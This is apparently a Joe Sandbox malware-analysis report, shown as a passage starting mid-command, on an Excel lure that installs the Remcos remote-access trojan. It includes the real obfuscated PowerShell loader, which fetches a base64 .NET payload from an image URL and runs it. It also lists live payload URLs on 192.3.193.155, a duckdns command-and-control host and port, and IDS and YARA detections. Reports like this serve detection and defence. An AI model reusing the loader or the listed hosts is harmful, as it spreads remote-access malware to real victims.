System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", ProcessId: 4012, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  Source: Registry Key set, Author: Joe Security: Data: Details: F8 8C A9 9F CF 8C 5C 85 10 76 EE EF DE 40 A4 E9 A5 CB ED 98 76 D2 A8 DC A7 72 C5 87 EC 9F 44 3E 3A 88 11 97 5A 15 66 E0 22 FF FD 1D 93 8E DA A2 58 86 91 11 B1 1F B9 46 4D 2C 5B 80 02 73 52 AB 13 4B 29 9B 0A D2 0D 28 22 8C C7 05 3F 97 72 05 84 F6 5E EB 10 D8 BC 85 04 1F 3A 6E C9 5D 5D 6A 9F 62 F6 03 8B AB 98 6C 51 7D 4B 76 DC 81 EC 7A 26 70 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3024, TargetObject: HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1\exepath

                  Suricata IDS alerts

                  Timestamp                          SID      Severity  Source Port  Destination Port  Protocol  Classtype
                  2024-08-28T06:56:30.438197+0200    2024449  1         49166        80                TCP       Attempted User Privilege Gain
                  2024-08-28T06:56:30.438199+0200    2024197  1         80           49166             TCP       A Network Trojan was detected
                  2024-08-28T06:56:28.368449+0200    2024449  1         49164        80                TCP       Attempted User Privilege Gain
                  2024-08-28T06:56:50.218487+0200    2024449  1         49175        80                TCP       Attempted User Privilege Gain
                  2024-08-28T06:57:02.959463+0200    2049038  1         443          49176             TCP       A Network Trojan was detected
                  2024-08-28T06:56:44.497830+0200    2020423  1         80           49169             TCP       Exploit Kit Activity Detected
                  2024-08-28T06:56:44.497830+0200    2020425  1         80           49169             TCP       Exploit Kit Activity Detected
                  2024-08-28T06:56:46.416632+0200    2036594  1         49170        14645             TCP       Malware Command and Control Activity Detected
                  2024-08-28T06:56:47.844263+0200    2803304  3         49172        80                TCP       Unknown Traffic
                  2024-08-28T06:56:28.368474+0200    2024197  1         80           49164             TCP       A Network Trojan was detected
                  2024-08-28T06:57:03.728683+0200    2020423  1         80           49177             TCP       Exploit Kit Activity Detected
                  2024-08-28T06:57:03.728683+0200    2020425  1         80           49177             TCP       Exploit Kit Activity Detected
                  2024-08-28T06:56:43.690731+0200    2049038  1         443          49168             TCP       A Network Trojan was detected

                  AV Detection

                  Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg, URL Reputation: Label: malware
                  Source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "cloudsave.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CJ3HJ1", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF, Virustotal: Detection: 9%
                  Source: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta, Virustotal: Detection: 10%
                  Source: http://192.3.193.155/xampp/boz/REDS.txt, Virustotal: Detection: 9%
                  Source: PO_304234.xls, Virustotal: Detection: 19%
                  Source: Yara match, File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR
                  Source: PO_304234.xls, Joe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 28_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,28_2_004338C8
                  Source: powershell.exe, 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_d18ed603-b

                  Exploits

                  Source: Yara match, File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 28_2_00407538 _wcslen,CoGetObject,28_2_00407538
                  Source: unknown, HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49171 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49174 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49173 version: TLS 1.2
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdb source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdb source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.pdbhPB source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.pdbhPB source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
